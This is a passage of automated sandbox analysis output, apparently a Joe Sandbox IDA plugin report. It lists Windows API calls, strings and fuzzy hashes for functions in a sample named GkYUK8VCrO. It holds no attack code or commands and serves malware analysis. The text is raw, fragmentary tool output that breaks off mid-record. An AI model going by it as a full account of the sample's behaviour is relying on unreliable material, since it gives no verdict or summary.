                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27490
                                • IsMenu.USER32(?), ref: 00B274A6
                                • CreatePopupMenu.USER32 ref: 00B274B0
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B274DD
                                • DrawMenuBar.USER32 ref: 00B274E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                • String ID: 0$F
                                • API String ID: 176399719-3044882817
                                • Opcode ID: 440e8349e27545986c088dbf51164adc756304af77eae5450f348b4b03434171
                                • Instruction ID: 7d00c781a9568c3e629d9c2d5726af6f51f66553a93f1c0c72c2403b65e340c5
                                • Opcode Fuzzy Hash: 440e8349e27545986c088dbf51164adc756304af77eae5450f348b4b03434171
                                • Instruction Fuzzy Hash: 5F414775A00216EFDB20EF64E984EAABBF9FF49300F144069E95997360DB35A910CB94
                                APIs
                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B277CD
                                • CreateCompatibleDC.GDI32(00000000), ref: 00B277D4
                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B277E7
                                • SelectObject.GDI32(00000000,00000000), ref: 00B277EF
                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B277FA
                                • DeleteDC.GDI32(00000000), ref: 00B27803
                                • GetWindowLongW.USER32(?,000000EC), ref: 00B2780D
                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B27821
                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B2782D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                • String ID: static
                                • API String ID: 2559357485-2160076837
                                • Opcode ID: d3e15c867c3773be4e366ce556f872faad73fcb72e939ec1c1ad1657f9776d84
                                • Instruction ID: 16783133d2b61beed3b966bc4dd777ccf6382f84e82c6adf1d8b93e012ea9c8b
                                • Opcode Fuzzy Hash: d3e15c867c3773be4e366ce556f872faad73fcb72e939ec1c1ad1657f9776d84
                                • Instruction Fuzzy Hash: 7E316331105125BBDF225F65DC09FEB3BB9FF09721F110264FA19960A0CB31D812DBA4
                                APIs
                                • _memset.LIBCMT ref: 00AC707B
                                  • Part of subcall function 00AC8D68: __getptd_noexit.LIBCMT ref: 00AC8D68
                                • __gmtime64_s.LIBCMT ref: 00AC7114
                                • __gmtime64_s.LIBCMT ref: 00AC714A
                                • __gmtime64_s.LIBCMT ref: 00AC7167
                                • __allrem.LIBCMT ref: 00AC71BD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC71D9
                                • __allrem.LIBCMT ref: 00AC71F0
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC720E
                                • __allrem.LIBCMT ref: 00AC7225
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC7243
                                • __invoke_watson.LIBCMT ref: 00AC72B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0
                                • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                • Instruction ID: c8b5f6e57ce7992d2ee0d5fc25629f7d81c9942c0d1a6a0697e0e89a3f541a59
                                • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                • Instruction Fuzzy Hash: 7B71B576A04716ABDB149F79CD42FAEB3B8AF14320F15422EF915E6381E770DA408B90
                                APIs
                                • _memset.LIBCMT ref: 00B02A31
                                • GetMenuItemInfoW.USER32(00B66890,000000FF,00000000,00000030), ref: 00B02A92
                                • SetMenuItemInfoW.USER32(00B66890,00000004,00000000,00000030), ref: 00B02AC8
                                • Sleep.KERNEL32(000001F4), ref: 00B02ADA
                                • GetMenuItemCount.USER32(?), ref: 00B02B1E
                                • GetMenuItemID.USER32(?,00000000), ref: 00B02B3A
                                • GetMenuItemID.USER32(?,-00000001), ref: 00B02B64
                                • GetMenuItemID.USER32(?,?), ref: 00B02BA9
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B02BEF
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02C03
                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02C24
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                • String ID:
                                • API String ID: 4176008265-0
                                • Opcode ID: d40cb845a48f4e4141a01d4a82c3e0a224a4a579b4b49fd84ff2aeceb0fa447b
                                • Instruction ID: 5a19d92a8795d5c3bbfaf0d7b95db9d28c99baff6b38d0ceecdcfba32e06949c
                                • Opcode Fuzzy Hash: d40cb845a48f4e4141a01d4a82c3e0a224a4a579b4b49fd84ff2aeceb0fa447b
                                • Instruction Fuzzy Hash: A86180B090024AAFEF21CF54D98CEBEBFF8EB45304F1445A9E84197291DB71AD09DB20
                                APIs
                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B27214
                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B27217
                                • GetWindowLongW.USER32(?,000000F0), ref: 00B2723B
                                • _memset.LIBCMT ref: 00B2724C
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B2725E
                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B272D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow_memset
                                • String ID:
                                • API String ID: 830647256-0
                                • Opcode ID: 005c74a48b680a523ca1b357e41dfb7adc8251f74248e858e758b3c2669e3a5e
                                • Instruction ID: c23964e044dedc9b7c013ed91e2de24e7e3d55265f31dce2fd46152eeb44edc1
                                • Opcode Fuzzy Hash: 005c74a48b680a523ca1b357e41dfb7adc8251f74248e858e758b3c2669e3a5e
                                • Instruction Fuzzy Hash: 73617C71940218AFDB10DFA4DC81EEE77F8EF09700F14019AFA14A72A1DB74AD46DBA4
                                APIs
                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AF7135
                                • SafeArrayAllocData.OLEAUT32(?), ref: 00AF718E
                                • VariantInit.OLEAUT32(?), ref: 00AF71A0
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AF71C0
                                • VariantCopy.OLEAUT32(?,?), ref: 00AF7213
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AF7227
                                • VariantClear.OLEAUT32(?), ref: 00AF723C
                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00AF7249
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF7252
                                • VariantClear.OLEAUT32(?), ref: 00AF7264
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF726F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                • String ID:
                                • API String ID: 2706829360-0
                                • Opcode ID: 9ae244ef5b85ca97743b9247b79bed6e523e59a39539277880fb65c0b6163e2b
                                • Instruction ID: cddde56d71a18841edc5925548d0f0bf5011284a1dcd5e17ee26f94cc2c45689
                                • Opcode Fuzzy Hash: 9ae244ef5b85ca97743b9247b79bed6e523e59a39539277880fb65c0b6163e2b
                                • Instruction Fuzzy Hash: 14413075900119AFCB10EFA8D9449FEBBB9EF08354F008075FA15A7361DB70A946CB90
                                APIs
                                • WSAStartup.WSOCK32(00000101,?), ref: 00B15AA6
                                • inet_addr.WSOCK32(?,?,?), ref: 00B15AEB
                                • gethostbyname.WSOCK32(?), ref: 00B15AF7
                                • IcmpCreateFile.IPHLPAPI ref: 00B15B05
                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15B75
                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15B8B
                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B15C00
                                • WSACleanup.WSOCK32 ref: 00B15C06
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                • String ID: Ping
                                • API String ID: 1028309954-2246546115
                                • Opcode ID: 4c81cecc1956d3e8fd05fb660c2717c078b3a53e601bdf683f2d0620a09c6507
                                • Instruction ID: 2d008a99133e0ba49b6c45dd37fcd3518393ca513d30aaac199793abbbbc9ad9
                                • Opcode Fuzzy Hash: 4c81cecc1956d3e8fd05fb660c2717c078b3a53e601bdf683f2d0620a09c6507
                                • Instruction Fuzzy Hash: AC519F31608701DFDB20AF24CD85B6BB7E4EF88710F4489AAF555DB2E1DB70E8818B55
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00B0B73B
                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B0B7B1
                                • GetLastError.KERNEL32 ref: 00B0B7BB
                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00B0B828
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Error$Mode$DiskFreeLastSpace
                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                • API String ID: 4194297153-14809454
                                • Opcode ID: fde78c5216253b8eded3c9b6af70543acc158ad780fa349560c0e7181e8edb4b
                                • Instruction ID: d30f2bdf5c2c1cf72d1dad038ada3febb0b05bc7623caac372ecd67b49af3395
                                • Opcode Fuzzy Hash: fde78c5216253b8eded3c9b6af70543acc158ad780fa349560c0e7181e8edb4b
                                • Instruction Fuzzy Hash: 6C318035A002099FDB10EF64C985EBE7BF8EF45740F1081A9E902E72E1DB719D46C751
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7
                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AF94F6
                                • GetDlgCtrlID.USER32 ref: 00AF9501
                                • GetParent.USER32 ref: 00AF951D
                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9520
                                • GetDlgCtrlID.USER32(?), ref: 00AF9529
                                • GetParent.USER32(?), ref: 00AF9545
                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9548
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1536045017-1403004172
                                • Opcode ID: f76610edccd764fe4189ccad20e46a0def628601f4f0532939385d09e2a0ad2a
                                • Instruction ID: 4f82864cbdc95e1a1aea629d2d477f8d8295bad0a9eaa4b598af9f7309339110
                                • Opcode Fuzzy Hash: f76610edccd764fe4189ccad20e46a0def628601f4f0532939385d09e2a0ad2a
                                • Instruction Fuzzy Hash: 3521A474E00208BBDF05ABA4CC85EFEBB74EF55310F104165BA61972E1DF755919DB20
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7
                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AF95DF
                                • GetDlgCtrlID.USER32 ref: 00AF95EA
                                • GetParent.USER32 ref: 00AF9606
                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9609
                                • GetDlgCtrlID.USER32(?), ref: 00AF9612
                                • GetParent.USER32(?), ref: 00AF962E
                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9631
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 1536045017-1403004172
                                • Opcode ID: 777d953580471c8d44fdd22b970be311bd6c0524028e95082c99570242fab4b6
                                • Instruction ID: baa2f6644b94808bb00ffd48b06f2e61cc24a2bffbfbcc71d52bcb8d0d9bc0ab
                                • Opcode Fuzzy Hash: 777d953580471c8d44fdd22b970be311bd6c0524028e95082c99570242fab4b6
                                • Instruction Fuzzy Hash: 8B21B374A00208BBDF11ABA0CC85EFEBBB8EF59300F104165BA51972E1DB75991DDA20
                                APIs
                                • GetParent.USER32 ref: 00AF9651
                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00AF9666
                                • _wcscmp.LIBCMT ref: 00AF9678
                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AF96F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClassMessageNameParentSend_wcscmp
                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                • API String ID: 1704125052-3381328864
                                • Opcode ID: 96ed3667432e36c5f7c24989cc1093f3dbc81281b45364312d770a3f05178b7a
                                • Instruction ID: 661d2d8ede9cc963b0de7dadb85c9834542b17855d0bf9e3abf3d681ebf2a82c
                                • Opcode Fuzzy Hash: 96ed3667432e36c5f7c24989cc1093f3dbc81281b45364312d770a3f05178b7a
                                • Instruction Fuzzy Hash: FE110D7714430BBAFE512764EC06FB777ECDB14761B2001A6FF00E50E1FE5159154558
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00B18BEC
                                • CoInitialize.OLE32(00000000), ref: 00B18C19
                                • CoUninitialize.OLE32 ref: 00B18C23
                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00B18D23
                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B18E50
                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B32C0C), ref: 00B18E84
                                • CoGetObject.OLE32(?,00000000,00B32C0C,?), ref: 00B18EA7
                                • SetErrorMode.KERNEL32(00000000), ref: 00B18EBA
                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B18F3A
                                • VariantClear.OLEAUT32(?), ref: 00B18F4A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                • String ID:
                                • API String ID: 2395222682-0
                                • Opcode ID: 9a4c5819a8cd3b7b3575c1c0ab9915d6f1f87c2b56eb75d3ac24c588a3f77604
                                • Instruction ID: 2b9675e347042f19f1fd7ab34c053a735cd872b5e90817cfc90fd2ac17c91cb2
                                • Opcode Fuzzy Hash: 9a4c5819a8cd3b7b3575c1c0ab9915d6f1f87c2b56eb75d3ac24c588a3f77604
                                • Instruction Fuzzy Hash: 80C13471208305AFC700EF64C88496BB7E9FF89748F4049ADF5899B260DB71ED46CB52
                                APIs
                                • __swprintf.LIBCMT ref: 00B0419D
                                • __swprintf.LIBCMT ref: 00B041AA
                                  • Part of subcall function 00AC38D8: __woutput_l.LIBCMT ref: 00AC3931
                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B041D4
                                • LoadResource.KERNEL32(?,00000000), ref: 00B041E0
                                • LockResource.KERNEL32(00000000), ref: 00B041ED
                                • FindResourceW.KERNEL32(?,?,00000003), ref: 00B0420D
                                • LoadResource.KERNEL32(?,00000000), ref: 00B0421F
                                • SizeofResource.KERNEL32(?,00000000), ref: 00B0422E
                                • LockResource.KERNEL32(?), ref: 00B0423A
                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B0429B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                • String ID:
                                • API String ID: 1433390588-0
                                • Opcode ID: 24913991d43604386038704f5d24fd8488bd34a9a3c70f7318011ba3a24687e0
                                • Instruction ID: 1b651004d95baa71c5dd5975d247fd804ff1b88236da4ea9b1c4d88f0bbe3955
                                • Opcode Fuzzy Hash: 24913991d43604386038704f5d24fd8488bd34a9a3c70f7318011ba3a24687e0
                                • Instruction Fuzzy Hash: 46319DB160520AAFCB119F60DD44EBB7BF8EF05341F0085A5FA02E3190DB74DA628BA1
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00B01700
                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B00778,?,00000001), ref: 00B01714
                                • GetWindowThreadProcessId.USER32(00000000), ref: 00B0171B
